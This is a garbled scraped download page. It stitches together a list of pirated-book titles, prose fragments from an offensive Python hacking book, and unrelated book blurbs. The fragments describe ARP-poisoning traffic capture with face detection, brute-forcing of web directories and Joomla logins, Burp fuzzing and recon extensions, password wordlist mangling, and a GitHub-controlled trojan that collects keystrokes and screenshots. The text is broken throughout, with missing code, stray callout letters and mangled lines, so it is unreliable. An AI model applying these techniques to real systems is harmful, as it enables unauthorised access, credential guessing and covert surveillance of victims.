Download PDF Tasha? Reid Wilson. Includes Valuable Basic Networking Concepts. Edition - Richard P. Download Bloodline Cradle, 9 - Will Wight. Download Calculus for Dummies - Mark Ryan. Download English in Action 1 - Barbara H. Download Japanese From Zero! Download Lala Pipo - Hideo Okuda. Download Managing to Learn - John Shook. Mizner Jr. Download Pedagogy of the Oppressed - Paulo Freire. You can of course do things such as force the target computer to proxy all of its traffic through a local instance of Burp or do any number of other nasty things.
Some great use cases are gen- erating fuzzing test cases based on captured network traffic or even some- thing as simple as replaying traffic that you have previously captured.
With these image files in hand, we will use OpenCV, 2 a computer vision tool, to attempt to detect images that contain human faces so that we can narrow down images that might be interesting. We can use our previous ARP poisoning script to generate the PCAP files or you could extend the ARP poisoning sniffer to do on-the- fly facial detection of images while the target is browsing.
To start, we open the PCAP file for processing u. We take advantage of a beautiful feature of Scapy to auto- matically separate each TCP session v into a dictionary. After we validate that we are receiving an image back in an HTTP response, we extract the raw image y and return the image type and the binary body of the image itself.
If we detect that the Content-Type header does indeed contain the image MIME type, we split out the type of image; and if there is compression applied to the image in transit, we attempt to decompress it before returning the image type and the raw image buffer.
Using the OpenCV Python bindings, we can read in the image u and then apply a classifier v that is trained in advance for detecting faces in a front-facing orientation. There are classifiers for profile sideways face detection, hands, fruit, and a whole host of other objects that you can try out for yourself. After the detection has been run, it will return rectangle coordinates that correspond to where the face was detected in the image.
We then draw an actual green rectangle over that area w and write out the resulting image x. If you crack open your faces directory, you should see a number of files with faces and magic green boxes drawn around them. This technique can be used to determine what types of content your target is looking at, as well as to discover likely approaches via social engi- neering. You can of course extend this example beyond using it against carved images from PCAPs and use it in conjunction with web crawling and parsing techniques described in later chapters.
In most modern networks, web applications present the largest attack surface and so are also the most common avenue for gaining access. There are a number of excellent web application tools that have been written in Python, including w3af, sqlmap, and others. The idea is to create a few different tools to give you the fundamental skills you need to build any type of web appli- cation assessment tool that your particular attack scenario calls for.
Be mindful that we are just fetching the raw page from the No Starch website, and that no JavaScript or other client-side languages will execute. We simply pass in a URL to the urlopen function u and it returns a file-like object that allows us to read back v the body of what the remote web server returns. In most cases, however, you are going to want more finely grained control over how you make these requests, including being able to define specific headers, handle cookies, and create POST requests.
To create custom headers, you define a headers dictionary u, which allows you to then set the header key and value that you want to use. We then create our Request object and pass in the url and the headers dictionary v, and then pass the Request object to the urlopen func- tion call w. This returns a normal file-like object that we can use to read in the data from the remote website. All systems have their own challenges in terms of installation, configuration, and patch management, and these CMS suites are no exception.
Because we can download any open source web application and locally determine its file and directory structure, we can create a purpose-built scanner that can hunt for all files that are reachable on the remote target. This can root out leftover installation files, directories that should be pro- tected by. This project also introduces you to using Python Queue objects, which allow us to build a large, thread-safe stack of items and have multiple threads pick items for processing.
This will allow our scanner to run very rapidly. Queue w for r,d,f in os. We also create a simple list of file extensions that we are not interested in finger printing. This list can be different depending on the target applica- tion. We then use the os. If the file is not found or is protected by an. Kicking the Tires For testing purposes, I installed Joomla 3. Brute-Forcing Directories and File Locations The previous example assumed a lot of knowledge about your target.
However, in a lot of cases there are configura- tion files, leftover development files, debugging scripts, and other security breadcrumbs that can provide sensitive information or expose functionality that the software developer did not intend. The only way to discover this content is to use a brute-forcing tool to hunt down common filenames and directories. We read in a wordlist file u and then begin iterating over each line in the file v. We have some built-in functionality that allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down.
This can be achieved by simply setting the resume variable to the last path that the brute forcer tried. When the entire file has been parsed, we return a Queue full of words to use in our actual brute-forcing function. We will reuse this function later in this chapter. The first is the ability to apply a list of extensions to test for when making requests.
URLError,e: if hasattr e, 'code' and e. If there is a list of file extensions passed in v, then we take the current word and apply each file extension that we want to test for. After we build a list of brute-forcing attempts, we set the User-Agent header to something innocu- ous w and test the remote web server.
We get our list of words to brute-force, create a simple list of file extensions to test for, and then spin up a bunch of threads to do the brute-forcing. In this case, the URL that is referenced in the source code points to an intentionally buggy web application hosted by Acunetix. The cool thing is that it shows you how effective brute-forcing a web application can be.
I cannot stress enough the importance to perform content brute- forcing against all of your web application targets. In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt and ensure that we accept cookies in our urllib2 session.
This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. The next are all of the fields required in order for the form sub- mission to be successful.
That ran- domized string is checked against your current user session, stored in a cookie, and even if you are passing the correct credentials into the login processing script, if the randomized token is not present, the authentica- tion will fail. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla: 1.
Retrieve the login page, and accept all cookies that are returned. Parse out all of the form elements from the HTML. Test to see if we have successfully logged in to the web application. You can see that we are going to be utilizing some new and valuable techniques in this script. After we grab our password attempt, we set up our cookie jar u using the FileCookieJar class that will store the cookies in the cookies file.
Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We then make the initial request to retrieve the login form.
When we have the raw HTML, we pass it off to our HTML parser and call its feed method v, which returns a dictionary of all of the retrieved form elements.
After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt w. After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not y. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored u.
After the HTML has been processed, our brute- forcing class can then replace the username and password fields while leaving the remainder of the fields intact. We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.
My target VM is at I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works.
I then added justin to the cain. Trying: admin : left Trying: admin : 2welcome left You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. Recent versions of Burp Suite include the ability to add your own tooling, called Extensions, to Burp. The first extension will enable us to utilize an intercepted HTTP request from Burp Proxy as a seed for creating a mutation fuzzer that can be run in Burp Intruder.
The second extension will interface with the Microsoft Bing API to show us all virtual hosts located on the same IP address as our target site, as well as any sub- domains detected for the target domain.
I have to admit that when I first started exploring the Burp Extender API, it took me a few attempts to understand how it worked.
But I found a number of extensions on the Burp website that let me see how other folks had developed extensions, and I used that prior art to help me understand how to begin implementing my own code. As sad as it makes me to admit this, you will require a modern Java instal- lation, which all operating systems either have packages or installers for.
Save the JAR file to an easy-to-remember location, such as your Desktop. Click the Extender tab, and then click the Options tab. You can leave the rest of the options alone, and we should be ready to start coding our first extension. Whether working with a binary protocol wrapped inside HTTP traffic or complex JSON requests, it is critical that you are able to test for traditional web application bugs.
I have also been guilty of run- ning standard tools that are not designed to deal with strange protocols or even JSON in a lot of cases. This is where it is useful to be able to leverage Burp to establish a solid baseline of HTTP traffic, including authentication cookies, while passing off the body of the request to a custom fuzzer that can then manipulate the payload in any way you choose. A common technique I use is to send them to the Repeater tool, which lets me replay web traffic, as well as manually modify any interesting spots.
To perform more automated attacks in query parameters, you will send a request to the Intruder tool, which attempts to automatically figure out which areas of the web traffic should be modified, and then allows you to use a variety of attacks to try to elicit error messages or tease out vulner- abilities. My first natural instinct is to take a look at the Burp API documenta- tion to determine what Burp classes I need to extend in order to write my custom extension.
You can access this documentation by clicking the Extender tab and then the APIs tab. This can look a little daunting because it looks and is very Java-y. Next we see that Burp is expect ing two functions to be present in our main class. The getGeneratorName function v will be called by Burp to retrieve the name of our extension, and we are expected to return a string.
The createNewInstance function w expects us to return an instance of the IIntruderPayloadGenerator, which will be a second class that we have to create. We have to first import the IBurpExtender class u, which is a requirement for every extension we write.
We follow this up by importing our necessary classes for creating an Intruder payload generator. We then use the registerIntruderPayloadGeneratorFactory function w to register our class so that the Intruder tool is aware that we can generate payloads. Next we imple- ment the getGeneratorName function x to simply return the name of our pay- load generator.
So we need to implement the base class and it needs to expose three functions. The first function, hasMorePayloads u, is simply there to decide whether to continue mutated requests back to Burp Intruder. Or, if you have selected multiple payload areas in the HTTP request, you will only receive the bytes that you requested to be fuzzed more on this later. This function allows us to fuzz the original test case and then return it so that Burp sends the new fuzzed value.
The last function, reset w, is there so that if we generate a known set of fuzzed requests—say five of them—then for each payload position we have designated in the Intruder tab, we will iterate through the five fuzzed values.
Next we implement the hasMorePayloads function w that simply checks whether we have reached the maximum number of fuzzing iterations. You could modify this to continually run the extension by always returning True. The getNextPayload function x is the one that receives the original HTTP payload and it is here that we will be fuzzing. Our last function is the reset function that returns without doing anything.
Because this function is aware of the cur- rent payload, if you have a tricky protocol that needs something special, like a CRC checksum at the beginning of the payload or a length field, you can do those calculations inside this function before returning, which makes it extremely flexible. We now have a Burp Intruder extension that we can use. Kicking the Tires First we have to get our extension loaded and make sure there are no errors. Click the Extender tab in Burp and then click the Add button.
A screen appears that will allow you to point Burp at the fuzzer. Ensure that you set the same options as shown in Figure If all goes well, Burp should indicate that the extension was loaded successfully. If there are errors, click the Errors tab, debug any typos, and then click the Close button.
Your Extender screen should now look like Figure Figure Burp Extender showing that our extension is loaded You can see that our extension is loaded and that Burp has identified that an Intruder payload generator is registered.
We are now ready to lever- age our extension in a real attack. A screen appears that shows each query parameter highlighted.
This is Burp identify- ing the spots where we should be fuzzing. For clarity, see Figure , which shows how payload highlighting works. Now click the Payloads tab. In this screen, click the Payload type drop- down and select Extension-generated. In the Payload Options section, click the Select generator Your Payload screen should now look like Figure At the top of the Burp menu bar, click Intruder and then select Start Attack.
This starts sending fuzzed requests, and you will be able to quickly go through the results. When I ran the fuzzer, I received output as shown in Figure Figure Our fuzzer running in an Intruder attack As you can see from the warning on line 61 of the response, in request 5, we discovered what appears to be a SQL injection vulnerability. The important thing is to understand how we managed to get our custom extension in line with Intruder attacks. Of course, you want to discover these hostnames exposed on the same web server because they might give you an easier way to get a shell.
In order to stay out of trouble, we can use the Bing API1 to submit these queries programmatically and then parse the results ourselves. Make sure you have your Bing API key pasted in place u; you are allowed something like 2, free searches per month. We begin by defining our BurpExtender class v that implements the standard IBurpExtender interface and the IContextMenuFactory, which allows us to provide a context menu when a user right-clicks a request in Burp.
We register our menu handler w so that we can determine which site the user clicked, which then enables us to construct our Bing queries. We then query Bing for all virtual hosts that have the same IP address w as the host contained within the HTTP request that was right- clicked. If a domain has been passed to our extension, then we also do a secondary search x for any subdomains that Bing may have indexed. This is a great blend of using the Jython API and pure Python in a Burp extension to do additional recon work when attacking a particular target.
Kicking the Tires Use the same procedure we used for our fuzzing extension to get the Bing search extension working. If the extension is loaded properly, you should see the menu option Send to Bing displayed as shown in Figure Figure Our extension providing output from the Bing API search And if you click the Target tab in Burp and then select Scope, you will see new items automatically added to our target scope as shown in Figure The target scope limits activities such as attacks, spidering, and scans to only those hosts defined.
In other instances, strong passwords are not enforced. In these cases, an online password guessing session like the one in the last chapter might be just the ticket to gain access to the site.
The trick to online password guessing is getting the right wordlist. Of course, there are scripts in the Kali Linux distribution that crawl a website and generate a wordlist based on site content. Plus, those scripts usually have a ton of command-line arguments to remember. We start by importing the required modules. Once again, the goal is to create a context menu item in the Burp UI. Next we loop through each suffix and add it to the base word v to create a unique password attempt. We do another loop with a capitalized version of the base word for good measure.
Then we mangle each base word and print the results. Time to take this baby for a spin. Kicking the Tires Click the Extender tab in Burp, click the Add button, and use the same procedure we used for our previous extensions to get the Wordlist exten- sion working. Right-click the site in the Site Map pane and select Spider this host, as shown in Figure You can now feed this list back into Burp Intruder to perform the actual password-guessing attack.
During a penetration test you will often come up against specific problems or automation needs, and the Burp Extender API provides an excellent interface to code your way out of a corner, or at least save you from having to continually copy and paste captured data from Burp to another tool. In this chapter, we showed you how to build an excellent reconnais- sance tool to add to your Burp tool belt. As is, this extension only retrieves the top 20 results from Bing, so as homework you could work on making additional requests to ensure that you retrieve all of the results.
This will require doing a bit of reading about the Bing API and writing some code to handle the larger results set. You of course could then tell the Burp spi- der to crawl each of the new sites you discover and automatically hunt for vulnerabilities! You can do this from the command line by doing the following: pip install github3. I do my develop- ment from a Linux machine, but it works on any platform.
The config direc- tory holds configuration files that will be uniquely identified for each tro- jan. As you deploy trojans, you want each one to perform different tasks and each trojan will check out its unique configuration file.
The modules direc- tory contains any modular code that you want the trojan to pick up and then execute. We will implement a special import hack to allow our trojan to import libraries directly from our GitHub repo. The data directory is where the trojan will check in any collected data, keystrokes, screenshots, and so forth. Open a new file in the modules directory, name it dirlister. Each module that you develop should expose a run function that takes a variable number of arguments.
This enables you to load each module the same way and leaves enough extensibility so that you can customize the configuration files to pass arguments to the module if you desire. This is exactly how you can continue to develop code in the future. I will leave the integration of more complex modules to you as a homework assignment.
Should you have a hun- dred deployed trojans, you can push new modules to your GitHub repo and QA them by enabling your new module in a configuration file for your local version of the trojan. This way, you can test on a VM or host hardware that you control before allowing one of your remote trojans to pick up the code and use it. This means that we need a way to tell it what actions to perform, and what modules are responsible for performing those actions.
Using a configuration file gives us that level of control, and it also enables us to effectively put a trojan to sleep by not giving it any tasks should we choose to. Each trojan that you deploy should have a unique identifier, both so that you can sort out the retrieved data and so that you can control which trojan performs certain tasks.
The JSON format makes it easy to change configuration options as well. Move into your config directory and create a file called abc. Drop into a command line and issue the following command from your main repo directory.
You provide a list of dictionaries that tell the trojan what modules to import and run. As you build up your framework, you can add additional functionality in these configuration options, including methods of exfiltration, as I show you in Chapter 9.
The first step is to build the necessary code to handle connecting, authenticating, and communicating to the GitHub API. Queue This is just some simple setup code with the necessary imports, which should keep our overall trojan size relatively small when compiled. If the Download link is not working, kindly drop a comment below, so we'll update the download link for you.
Happy downloading! Type Here to Get Search Results! Tags Programing. Show more. In Black Hat Physical Device Security: Exploiting Hardware and Software, the Black Hat experts show readers the types of attacks that can be done to physical devices such as motion detectors, video monitoring and closed circuit systems, authentication systems, thumbprint and voice print devices, retina scans, and more.
The Black Hat Briefings held every year in Las Vegas, Washington DC, Amsterdam, and Singapore continually expose the greatest threats to cyber security and provide IT mind leaders with ground breaking defensive techniques. There are no books that show security and networking professionals how to protect physical security devices. This unique book provides step-by-step instructions for assessing the vulnerability of a security device such as a retina scanner, seeing how it might be compromised, and taking protective measures.
The book covers the actual device as well as the software that runs it. By way of example, a thumbprint scanner that allows the thumbprint to remain on the glass from the last person could be bypassed by pressing a "gummy bear" piece of candy against the glass so that the scan works against the last thumbprint that was used on the device. This is a simple example of an attack against a physical authentication system. First book by world-renowned Black Hat, Inc. Subjects include intrusion detection, DDoS attacks, buffer overflows, virus creation, and more.
By New Yorker and Atlantic writer Carl Elliott, a readable and even funny account of the serious business of medicine. A tongue-in-cheek account of the changes that have transformed medicine into big business. Physician and medical ethicist Carl Elliott tracks the new world of commercialized medicine from start to finish, introducing the professional guinea pigs, ghostwriters, thought leaders, drug reps, public relations pros, and even medical ethicists who use medicine for sometimes huge financial gain.
Along the way, he uncovers the cost to patients lost in a health-care universe centered around consumerism. Dilip B. Hackers are those individuals who gain access to computers or networks without official permission. In this intriguing resource, readers learn the differences among white hat, black hat, and gray hat hackers and their ways of working concerning computer networks today. The origins and history of hacker culture are examined, as are the law enforcement methods of catching criminals.
Some of the topics covered are the motives for hacking, black hat targets, online hazards, malware programs, and typical hacker techniques.
Government-sponsored hacking in cyber warfare efforts, hactivism, and famous hackers are also reviewed. Accessible and concise, this exciting new textbook examines data analytics from a managerial and organizational perspective and looks at how they can help managers become more effective decision-makers.
Suitable for management students studying business analytics and decision-making at undergraduate, postgraduate and MBA levels. The perfect supplement to CEH Certified Ethical Hacker All-in-One Exam Guide, this practice exams book provides valuable test preparation for candidates preparing to pass the exam and achieve one of the fastest-growing information security credentials available.
Designed as an exam-focused study-self aid and resource, CEH Certified Ethical Hacker Practice Exams offers practice test items from each domain of the latest CEH exam, and provides knowledge and scenario-based questions plus one case study-based Lab Question per chapter.
0コメント